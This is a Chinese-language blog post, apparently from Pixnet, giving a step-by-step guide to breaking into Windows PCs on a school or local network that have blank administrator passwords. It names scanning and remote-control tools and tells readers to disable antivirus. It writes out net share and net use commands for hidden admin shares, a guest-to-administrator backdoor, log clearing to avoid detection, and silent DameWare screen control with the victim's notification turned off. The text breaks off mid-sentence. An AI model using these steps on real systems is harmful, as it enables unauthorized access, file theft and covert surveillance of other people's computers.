1.入侵的範圍只包括局域網,如果在學校上,可以入侵整個校園網;

2.能入侵的只是存在弱口令(使用者名為administrator等,密碼為空),並且開了139埠,但沒開防火牆的機子。
入侵工具:
一般要用到三個:NTscan變態掃描器,Recton--D賀免殺專用版,DameWare迷你中文版 4.5. (前兩個工具殺毒軟體都會報毒,建議將殺毒軟體即時防毒暫時關掉,並將這兩個軟體的壓縮包加密,防止被殺。)



入侵步驟:
1.使用"NTscan變態掃描器",在IP處填上要掃描的IP範圍,選擇"WMI掃描"方式,按"開始"後就等掃描結果了。
2.使用"Recton--D賀免殺專用版"
選擇"CMD命令"項,在"CMD:"中輸入"net share C$=C:\",即可開啟遠端主機的C盤共用,以此將"C"換成D,E,F等,即可開啟D盤,E盤,F盤等的共用,這種共用方式隱蔽性很高,而且是完全共用,在對方主機上不會出現一隻手托住盤的共用標誌,然後在位址欄中輸入"\\對方IP\C$",即可進入對方C盤。
選擇"Telnet"項,在"遠端主機"中輸入剛才掃描到的一個IP,遠端啟動Telnet服務,成功後在"CMD選項"中,執行命令:"net share ipc$",接著執行:"net share admin$",最後執行"net use [url=file://\\***.***.***.***\IPC$]\\***.***.***.***\IPC$[/url] "" /user:administrator"在*處填入你入侵的主機IP。
3.使用"DameWare迷你中文版 4.5",安裝後點"DameWare Mini Remote Control",在"説明"項中選擇啟動產品,輸入註冊資訊,成功註冊後,進入"遠端連接"視窗,在"主機"處填入IP位址,點"設置",在"服務安裝選項"中點"編輯"後,在"通知對話方塊"中去掉"連接時通知",在"附加設置"中全都不選,在"使用者選項"中去掉"啟用使用者選項功能表"。設置完成好後,就可點"連接",在彈出的對話方塊中點"確定"後,成功後你就可以像操作自己機子一樣控制別人電腦了,當然你也可以只選擇監視對方螢幕。 注意:如果不註冊的話,在對方主機上會彈出一個對話方塊,暴露你的身份。
入侵步驟補充:
1.在以上第2步中,遠端啟動Telnet服務可以通過"我的電腦-管理-連接到另一台電腦-輸入IP-服務和應用程式-服務-將telnet改為手動-啟動"完成。
2.Recton--D賀免殺專用版還有其他功能,在"進程"項中,可以查看遠端主機的進程,並可任意結束其中進程;在"共用"項中,可以創建共用,我常用的是創建C$,D$,E$,F$,共用路徑分別對應C:\,D:\等,共用好後在位址欄中輸入"[url=file://\\IP\C$]\\IP\C$[/url]",進入對方C盤,你就可以隨意複製刪除裡面的東西了,而且這種共用對方機子盤符上不會顯示共用圖示,也就不會被發現,弄完後最好還是把共用給關掉。最後選"日誌",清除所有日誌,不留痕跡。這個軟體會被殺毒軟體當作病毒殺掉,用它時須將即時防毒關掉。
3.上面的共用可通過CMD(程式-附件-命令提示符)完成,首先"telnet IP",telnet上去,鍵入y後輸入的使用者名"administrator",密碼為空, 進入後,開共用用net share命令,共用C$(即C盤):"net share C$=C:",共用system資料夾:"net share c=c:\winnt\system32",共用IPC$用:"net share IPC$"等,最後是關閉共用,關閉C盤共用:"net share C$ /del"。
4.為方便下次入侵,可以設置後門, 查看使用者:"net user",啟動guest使用者
"net user guest /active:yes",更改guest的密碼為poco:"net user guest poco",把guest的許可權提升為管理員許可權:"net localgroup administrators guest /add"。
5.telnet命令(DOS命令)很多,可去網上查找它的命令,常用的有:查看D盤檔:""dir d:\",查看C盤program file資料夾:"dir c:\PROGRA~1\;",60秒倒記時關機:"shutdown -s -t 60"
補充說明:
1.net use錯誤原因解決:
(1)."發生系統錯誤 1326。 登錄失敗: 未知的使用者名或錯誤密碼。"
在遠端機的"控制台-資料夾選項-查看-簡單的檔共用",去掉選取,然後再嘗試連接。簡單檔共用會把網路連接許可權都歸為 guest連接,是無法訪問C$等管理共用的.
(2)"發生系統錯誤 1327。 登陸失敗:使用者帳戶限制。可能的原因包括不允許空密碼,登陸時間限制,或強制的策略限。"在遠端機的"控制台-管理工具-本地安全性原則-安全選項-使用者許可權"指派裡,禁用"空密碼使用者只能進行主控台登陸".
(3)"//IP/c$"時提示找不到網路途徑。在"網路和撥號連線"中"本地連接"中選取"Internet協定(TCP/IP)"屬性,進入"高級TCP/IP設置"選"WINS設置"裡面有一項"啟用TCP/IP的NETBIOS
arrow
arrow
    全站熱搜

    戮克 發表在 痞客邦 留言(0) 人氣()

    E-mail轉寄